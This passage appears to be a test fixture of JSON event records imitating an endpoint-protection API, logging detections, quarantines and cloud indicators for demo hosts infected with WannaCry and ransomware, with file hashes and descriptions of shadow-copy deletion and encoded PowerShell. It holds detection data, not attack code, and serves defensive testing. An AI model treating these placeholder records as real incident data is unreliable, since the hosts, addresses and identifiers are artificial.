Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
